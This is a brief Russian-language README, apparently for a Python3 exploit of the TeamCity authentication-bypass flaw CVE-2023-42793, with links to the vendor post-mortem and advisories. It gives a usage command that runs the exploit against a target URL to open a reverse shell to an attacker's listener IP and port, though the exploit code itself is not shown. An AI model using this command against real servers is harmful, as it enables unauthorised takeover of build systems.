
JetBrains TeamCity: неаутентифицированное удаленное выполнение кода - реализация на Python3
JetBrains TeamCity версии до 2023.05.4 уязвим к обходу аутентификации, что приводит к удаленному выполнению кода (RCE)
Для получения reverse shell
python3 exploit.py <target_url> <listener_ip> <listener_port>
https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/
http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html
https://nvd.nist.gov/vuln/detail/cve-2023-42793